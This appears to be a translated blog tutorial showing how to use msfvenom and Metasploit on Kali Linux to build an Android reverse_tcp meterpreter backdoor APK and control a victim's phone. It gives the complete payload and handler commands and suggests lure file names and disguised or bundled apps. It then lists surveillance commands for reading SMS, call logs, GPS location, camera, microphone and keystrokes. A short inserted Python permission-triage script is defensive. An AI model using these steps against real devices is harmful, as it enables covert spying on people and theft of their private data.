Using MSF on Kali Linux to break into an Android phone (very detailed beginner's version)

1. What is MSF

msfvenom is Metasploit's standalone payload generator and the replacement for msfpayload and msfencode. It is the software used to generate backdoors.
msfvenom combines msfpayload and msfencode in a single framework instance. As of June 8, 2015, msfvenom replaces msfpayload and msfencode.

Demo environment

Kali 2021.3 is used for the demonstration
Target machine: Xiaoyao emulator, Android 7.1.2
Software: msfvenom, msfconsole (built into Kali)

2. The penetration process

1. Enter administrator mode

Command: sudo su
Explanation: If you do not run in administrator mode, you may be told that you have insufficient permissions. To avoid failed commands, run the following commands as administrator.

Tip: Enter Kali's password after executing the command. The password is not shown as you type; just type it and press Enter.

2. Generate executable Trojan files

Command: msfvenom -p android/meterpreter/reverse_tcp LHOST=<local IP> LPORT=<local port> R > <file name>.apk
Example: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
Explanation: For the local IP, write the IP address of your own Kali host; you can use ifconfig to view it. For the local port, set a port number that is not occupied. If the port number is occupied, the file will fail to be generated. The file name is just a name, and you can write any name you like, such as "free thumbs up", which may make it easier for the target host to be hooked.



This is the IP address of the Kali host

Next, run the command to generate the Trojan.

The generated file is placed in the root directory by default.

Put the Android backdoor just generated onto the target machine.

3. Run the msfconsole command

Command: msfconsole

4. Configuration parameters

(1) Command: use exploit/multi/handler (Select the module)
(2) Command: set payload android/meterpreter/reverse_tcp (Select the attack payload)
(3) Command: set LHOST 192.168.32.1 (Fill in the IP address of your own host)
(4) Command: set LPORT 5555 (Fill in the port number used when the file was generated)
(5) Command: show options (View the configured parameters)
(6) Command: exploit -z -j (Run in the background)

After the parameters are set, open the program on the target machine and run the command in step (6). You can also enter the command exploit directly to start the attack. As long as the target machine has the backdoor software installed, either method can be used.

[Screenshot: detailed demonstration of the attack configuration parameters]

Now wait for the target machine to open the app.

5. Open the executable file on the target machine

We can also disguise the program here, change its icon, or bundle it with some other software, so that when the user opens it, it is automatically installed on the other party's computer.

6. View users

(1) Command: sessions (View the hooked users)
(2) Command: sessions -i 1 (Select the user to be attacked)

When the meterpreter prompt appears, the intrusion has succeeded.

3. Meterpreter commands for hacking the Android phone

1. Check the other party's mobile phone system information

Command: sysinfo

2. Check which app files are installed on the other party's phone

Command: app_list

3. Remotely control the other party's mobile phone to take a photo

Command: webcam_snap

4. Remotely control the other party's mobile phone to start video chat

Command: webcam_chat

5. View the text messages on the other party's mobile phone in real time

Command: dump_sms

6. Get the address book of the other party's mobile phone

Command: dump_calllog

7. Obtain the GPS location of the other party's mobile phone in real time

Command: geolocate
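
From the defender's side, the commands above can only work if the installed app holds the matching Android permissions, so the permission list of an unknown APK is a useful triage signal. The following is an added example, not code from the original post: it parses `aapt dump permissions` output, and the command-to-permission mapping, the threshold of three and the sample inputs are assumptions constructed for illustration.

```python
import re

# Assumption (added here, not from the page): the Android permission an app
# must hold before each capability demonstrated above can work.
CAPABILITY_PERMISSIONS = {
    "webcam_snap / webcam_chat": {"android.permission.CAMERA"},
    "dump_sms": {"android.permission.READ_SMS"},
    "dump_calllog": {"android.permission.READ_CALL_LOG"},
    "geolocate": {"android.permission.ACCESS_FINE_LOCATION",
                  "android.permission.ACCESS_COARSE_LOCATION"},
}

# Accepts both aapt styles: "uses-permission: name='X'" and "uses-permission: X".
PERMISSION_LINE = re.compile(r"^uses-permission[\w-]*:\s*(?:name=)?'?([\w.]+)")

def parse_permissions(aapt_output):
    """Return the set of permissions named in `aapt dump permissions` output."""
    found = set()
    for line in aapt_output.splitlines():
        match = PERMISSION_LINE.match(line.strip())
        if match:
            found.add(match.group(1))
    return found

def surveillance_capabilities(permissions):
    """Return the capability groups for which a required permission is requested."""
    return sorted(name for name, needed in CAPABILITY_PERMISSIONS.items()
                  if needed & permissions)

def triage(aapt_output, threshold=3):
    """Flag an APK requesting `threshold` or more capability groups (assumed cutoff)."""
    caps = surveillance_capabilities(parse_permissions(aapt_output))
    return {"capabilities": caps, "suspicious": len(caps) >= threshold}

# Constructed sample inputs (not real scan output).
SAMPLE_FLASHLIGHT = """package: com.example.flashlight
uses-permission: name='android.permission.CAMERA'
"""
SAMPLE_OVERBROAD = """package: com.example.unknown
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CALL_LOG'
uses-permission: android.permission.ACCESS_FINE_LOCATION
"""

if __name__ == "__main__":
    for label, sample in (("flashlight", SAMPLE_FLASHLIGHT), ("unknown", SAMPLE_OVERBROAD)):
        print(label, triage(sample))
```

A single sensitive permission is common in legitimate apps; the signal is an unknown app requesting several of these groups at once.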

8. More commands

You can also view the help documentation with the command help.

cmd commands:
cat: read file contents to the screen
cd: change directory
checksum: retrieve the checksum of a file
cp: copy source to destination
del: delete the specified file
dir: list files (alias for ls)
download: download a file or directory
edit: edit a file
getlwd: print the local working directory
getwd: print the working directory
lcd: change the local working directory
lls: list local files
lpwd: print the local working directory
ls: list files
mkdir: create a directory
mv: move source to destination
pwd: print the working directory
rm: delete the specified file
rmdir: delete a directory
search: search for files
show_mount: list all mount points/logical drives
upload: upload a file or directory
pkill: kill a process by name

meterpreter commands:
keyscan_start: start capturing keystrokes (start keylogging)
keyscan_dump: dump the keystroke buffer (download the keylog)
keyscan_stop: stop capturing keystrokes (stop keylogging)
record_mic: record audio from the default microphone for X seconds
webcam_chat: start a video chat (the other party will see a pop-up window)
webcam_list: list webcams (view the camera list)
webcam_snap: take a snapshot from the specified webcam
webcam_stream: play the video stream from the specified webcam (camera monitoring)
enumdesktops: list all accessible desktops and window stations
getdesktop: get the current meterpreter desktop
setdesktop: change the meterpreter's current desktop
reboot: reboot the remote computer
shutdown: shut down the remote computer
shell: drop into a system command shell
idletime: return the number of seconds the remote user has been idle
keyboard_send: send keystrokes
keyevent: send a keystroke event
mouse: send mouse events
screenshare: watch the remote user's desktop in real time
screenshot: take a screenshot of the interactive desktop
uictl: control some user interface components
play: play a wave audio file (.wav) on the target system
getsystem: attempt to elevate your privileges to those of the local system
execute -f notepad: open Notepad

[Screenshot: command for uploading a file to the target machine]

[Screenshot: command for downloading a file to the host]

Origin blog.csdn.net/RFZ_322/article/details/124277545